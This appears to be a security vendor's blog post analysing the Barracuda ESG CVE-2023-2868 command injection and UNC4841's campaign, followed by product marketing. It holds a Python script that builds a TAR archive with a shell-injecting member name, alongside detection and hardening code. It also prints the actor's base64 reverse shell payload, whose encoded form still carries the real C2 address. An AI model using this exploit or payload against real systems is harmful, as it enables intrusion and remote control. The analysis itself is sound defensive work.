CVE-2023-2868: Barracuda ESG Vulnerability Actively Exploited by UNC4841


On July 28th, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released an alert, together with malware analysis reports, on backdoors deployed through a critical remote command injection vulnerability in the Barracuda Email Security Gateway (ESG) [1]. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical) that has been exploited since October 2022 by UNC4841, a cyber espionage group with suspected links to China.

In this blog, we explain how the Barracuda CVE-2023-2868 exploit works and the malware used by UNC4841.


What is Barracuda CVE-2023-2868 Command Injection Vulnerability?

Barracuda Email Security Gateway (ESG) is a security appliance that inspects inbound and outbound email traffic for email-borne threats and data leaks. In May 2023, Barracuda disclosed that it had found and patched a critical remote command injection vulnerability in ESG. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical), and the earliest evidence of exploitation dates back to October 2022. Barracuda estimates that about 5% of its 11,000 ESG appliances worldwide are impacted.

Barracuda ESG versions 5.1.3.001 through 9.2.0.006 are affected. For mitigation, Barracuda urges users to isolate and replace impacted ESG appliances rather than rely on the patch alone, and to rotate any credentials connected to the appliance. Barracuda has issued RMA guidance for replacing hardware ESG appliances.

How Does the Barracuda ESG CVE-2023-2868 Exploit Work?

CVE-2023-2868 is a command injection vulnerability that lets a remote, unauthenticated attacker execute arbitrary commands on the appliance. The root cause lies in the logic that screens TAR file attachments: Barracuda ESG extracts each archive member with the Perl routine below, passing the member's file name ($f) to the tar binary ($tarexec) through a qx{} call, which hands the whole string to a system shell. Because the user-controlled file name is not sanitized, an attacker can craft a TAR archive whose member names contain shell metacharacters and thereby execute system commands with the ESG's privileges [2].

qx{$tarexec -O -xf $tempdir/parts/$part '$f'};

Example 1: Vulnerable Perl routine in Barracuda ESG
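To make the interpolation concrete, the following Python script (an added example, not Barracuda or Picus code) builds an in-memory TAR archive whose member name contains shell metacharacters, reproduces the command string the qx{} call above would hand to /bin/sh, and shows both a pre-screening check for such archives and the argument-list form that keeps the shell out of the path. The tar path, temp directory, part name, and the crafted member name are all constructed for illustration and are not the actor's actual payload.

```python
import io
import re
import tarfile

TAREXEC = "/bin/tar"  # assumed path; the real value is set by the ESG firmware

# Constructed member name: the leading ' closes the single-quoted argument in the
# qx{} string, the backticks run a command substitution, and the trailing '
# reopens the quote so the shell still sees a well-formed line.
# "aWQ=" is base64("id"); it stands in for a real second-stage payload.
CRAFTED_NAME = "'`echo aWQ= | base64 -d | sh`'"


def vulnerable_command(tempdir: str, part: str, f: str) -> str:
    """String that the Perl call  qx{$tarexec -O -xf $tempdir/parts/$part '$f'}
    builds: $f is interpolated verbatim, so a quote or backtick in the member
    name is interpreted by /bin/sh instead of being treated as part of the name."""
    return f"{TAREXEC} -O -xf {tempdir}/parts/{part} '{f}'"


def build_tar(member_name: str, payload: bytes = b"x") -> bytes:
    """In-memory TAR with a single member; only the name matters to the exploit."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Characters that change the meaning of a single-quoted shell word: ' ends the
# literal; ` and $( run commands; ; | & < > chain or redirect; newline splits lines.
SHELL_META = re.compile(r"[`'\"$;|&<>(){}\n]")


def is_suspicious_member(name: str) -> bool:
    """True if a member name could break out of the quoted argument."""
    return SHELL_META.search(name) is not None


def scan_tar(data: bytes) -> list:
    """Names of all members in a TAR archive that contain shell metacharacters.
    This is the pre-screening check an appliance (or a gateway in front of it)
    should apply before handing archive contents to any shell."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        return [m.name for m in tar.getmembers() if is_suspicious_member(m.name)]


def safe_argv(tempdir: str, part: str, f: str) -> list:
    """Hardened form: pass each argument separately and never spawn a shell.
    The Perl equivalent is the list form
    system($tarexec, '-O', '-xf', "$tempdir/parts/$part", $f)."""
    return [TAREXEC, "-O", "-xf", f"{tempdir}/parts/{part}", f]


if __name__ == "__main__":
    archive = build_tar(CRAFTED_NAME)
    print("flagged members:", scan_tar(archive))
    print("shell sees:    ", vulnerable_command("/tmp/abc", "part1", CRAFTED_NAME))
    print("safe argv:     ", safe_argv("/tmp/abc", "part1", CRAFTED_NAME))
```

Note that the list form only removes the shell; tar itself must still be invoked so that a member name cannot be parsed as an option, and the appliance should still reject archives that fail the screening check rather than extract them.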

Barracuda released an initial patch for the vulnerability on May 23rd, 2023. However, UNC4841 responded by modifying its malware and persistence mechanisms on already compromised appliances, and on May 31st, 2023, Barracuda advised customers to isolate and replace impacted ESG appliances regardless of patch level, since a patch cannot evict an attacker who already has persistence on the device.

Chinese APT Group UNC4841

UNC4841 is a cyber espionage group whose campaigns are assessed to be conducted in support of the Chinese government. Nearly half of the targeted organizations are located in the Americas, and about a third of them are government organizations. Individuals working for governments or research institutes are also targeted, as they are likely to hold political or strategic information.

As the initial access vector, UNC4841 sends emails carrying attachments crafted to exploit CVE-2023-2868. The attachment may use a TAR, JPG, or DAT extension, but it is processed as a TAR archive when the ESG screens it. When the appliance extracts the archive, the crafted member name is interpolated into the qx{} call shown above and the embedded reverse shell payload executes, giving the attacker a shell on the appliance.

Obfuscated payload

c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjE0OS4xNTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=

Deobfuscated payload (the actor's C2 address, present in the encoded form, is replaced with a placeholder)

setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect <UNC4841_C2_Server> >/tmp/p 2>/dev/null;rm /tmp/p"

Example 2: Reverse Shell Payload used by UNC4841

How Does Picus Help Simulate Barracuda ESG CVE-2023-2868 RCE Attacks?

We strongly suggest simulating CVE-2023-2868 exploitation attacks to test the effectiveness of your security controls against sophisticated cyber attacks using Picus The Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Log4Shell, ProxyNotShell, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for CVE-2023-2868 exploitation attacks and the malware deployed through it:

Threat ID | Threat Name | Attack Module
74165 | WHIRLPOOL Backdoor Malware Download Threat | Network Infiltration
34162 | WHIRLPOOL Backdoor Malware Email Threat | Email Infiltration
47061 | SEASPY Backdoor Malware Download Threat | Network Infiltration
74675 | SEASPY Backdoor Malware Email Threat | Email Infiltration
26107 | Barracuda CVE-2023-2868 Remote Command Injection Vulnerability Download Threat | Network Infiltration
51027 | Barracuda CVE-2023-2868 Remote Command Injection Vulnerability Email Threat | Email Infiltration (Phishing)

Moreover, Picus Threat Library contains 300+ threats comprising 3000+ web application and vulnerability exploitation attacks, in addition to 1500+ endpoint threats and 8000+ malware, email, and data exfiltration threats as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures that address CVE-2023-2868 exploitation and the related malware in preventive security controls. Picus Labs has validated the following signatures for CVE-2023-2868 exploitation attacks:

Security Control | Signature ID | Signature Name
Check Point NGFW | 0BB29FE1D | Backdoor.Linux.Barracuda.TC.ac43pCBn
Check Point NGFW | 0C688486B | Backdoor.Linux.Barracuda.TC.cc22culd
Check Point NGFW | 0A44B817D | Backdoor.Linux.Barracuda.TC.1089EgCP
Cisco FirePower | 1.61918.2 | SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt
Forcepoint NGFW |  | File_Malware-Blocked
Fortigate AV | 10142373 | Linux/Barr.CUDA!tr
Snort | 1.61918.2 | SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt
Snort | 1.61920.2 | SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt
Tippingpoint | 42865 | TCP: Barracuda Email Security Gateway Command Injection Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus The Complete Security Validation Platform.

References

[1] "CISA Releases Malware Analysis Reports on Barracuda Backdoors," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors. [Accessed: Jul. 31, 2023]

[2] "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China," Mandiant, Jun. 15, 2023. Available: https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally. [Accessed: Jul. 31, 2023]